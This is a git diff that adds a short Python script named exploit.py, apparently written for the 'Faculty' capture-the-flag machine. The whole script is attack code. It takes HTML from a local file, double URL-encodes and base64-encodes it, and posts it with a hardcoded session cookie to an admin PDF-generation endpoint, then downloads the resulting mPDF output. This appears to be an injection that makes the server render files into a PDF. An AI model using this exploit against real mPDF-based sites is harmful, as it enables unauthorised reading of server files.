diff options
Diffstat (limited to 'faculty/exploit.py')
| -rw-r--r-- | faculty/exploit.py | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/faculty/exploit.py b/faculty/exploit.py new file mode 100644 index 0000000..5bda40d --- /dev/null +++ b/faculty/exploit.py @@ -0,0 +1,14 @@ +import urllib.parse +import urllib.request +import base64 +import requests +import os + +with open('code.html') as h: + code = h.read().strip() +ueCode = urllib.parse.quote(urllib.parse.quote(code)) +b64enc = base64.b64encode(ueCode.encode("ascii")).decode('UTF-8') + +r = requests.post('http://faculty.htb/admin/download.php', data={"pdf": b64enc}, cookies={"PHPSESSID": "s7qhujjj9qmqoeju6enate61nj"}) + +urllib.request.urlretrieve(f'http://faculty.htb/mpdf/tmp/{r.text}', 'file.pdf') |